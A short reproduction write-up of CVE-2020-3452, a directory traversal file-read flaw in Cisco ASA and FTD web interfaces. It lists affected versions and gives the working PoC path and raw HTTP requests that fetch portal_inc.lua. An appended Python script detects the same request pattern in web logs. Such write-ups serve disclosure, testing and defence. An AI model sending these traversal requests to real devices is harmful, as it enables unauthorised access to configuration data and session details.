Cisco ASA Arbitrary File Read Vulnerability Reproduction (CVE-2020-3452)


I. Vulnerability Description

The web management interfaces of Cisco Adaptive Security Appliance (ASA) firewall devices and Cisco Firepower Threat Defense (FTD) devices contain an unauthenticated directory traversal vulnerability that allows remote arbitrary file reading. An attacker can only view files in the web directory and cannot access files outside it. The vulnerability can expose WebVPN configuration information, cookies, and so on.

II. Scope of Impact

The following are the system versions affected by the CVE-2020-3452 vulnerability:

Cisco ASA devices

< 9.6.1

9.6 < 9.6.4.42

9.71

9.8 < 9.8.4.20

9.9 < 9.9.2.74

9.10 < 9.10.1.42

9.12 < 9.12.3.12

9.13 < 9.13.1.10

9.14 < 9.14.1.10

Cisco FTD devices affected versions:

6.2.2

6.2.3 < 6.2.3.16

6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1

6.4.0 < 6.4.0.9 + Hot Fix

< Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)

6.6.0 < 6.6.0.1

III. Vulnerability Reproduction

PoC:

/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

Full request:

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: webvpnlogin=1; webvpnLang=en

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Content-length: 2

Requesting the core path alone is sufficient.

Accessing the URL directly downloads the requested file.
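A defender-side check for the request shown above, as an added example that is not part of the original post: it scans web access logs for `/+CSCOT+/translation-table` requests whose `lang` or `textdomain` parameter carries a path. The log lines are constructed, and the combined log format (as written by a proxy or WAF in front of the device), the function names and the rule that a legitimate `textdomain` never contains a slash are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in combined log format (assumed to come from a
# proxy or WAF in front of the device); not captured traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Aug/2020:10:00:01 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 4312
192.0.2.10 - - [01/Aug/2020:10:00:05 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&lang=en HTTP/1.1" 200 812
192.0.2.11 - - [01/Aug/2020:10:00:09 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 2301
198.51.100.7 - - [01/Aug/2020:10:00:12 +0000] "GET /%2bCSCOT%2b/translation-table?type=mst&textdomain=%2F%2BCSCOE%2B%2Fportal_inc.lua&lang=..%2f HTTP/1.1" 404 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
ENDPOINT = "/+cscot+/translation-table"


def is_traversal_probe(target):
    """True if the request target matches the CVE-2020-3452 request shape."""
    parts = urlsplit(target)
    # Decode the path first so %2bCSCOT%2b is treated the same as +CSCOT+.
    if unquote(parts.path).lower().rstrip("/") != ENDPOINT:
        return False
    params = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded
    lang_bad = any(".." in v for v in params.get("lang", []))
    # Assumption: a legitimate textdomain is a plain name, never a path.
    td_bad = any("/" in v or "\\" in v for v in params.get("textdomain", []))
    return lang_bad or td_bad


def scan(log_text):
    """Return one record per suspicious request, with a triage hint."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and is_traversal_probe(m["target"]):
            hits.append({"ip": m["ip"], "status": int(m["status"]),
                         "file_likely_returned": m["status"] == "200"})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 is the one to triage first, since the device answered the request with content.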


thelostworld
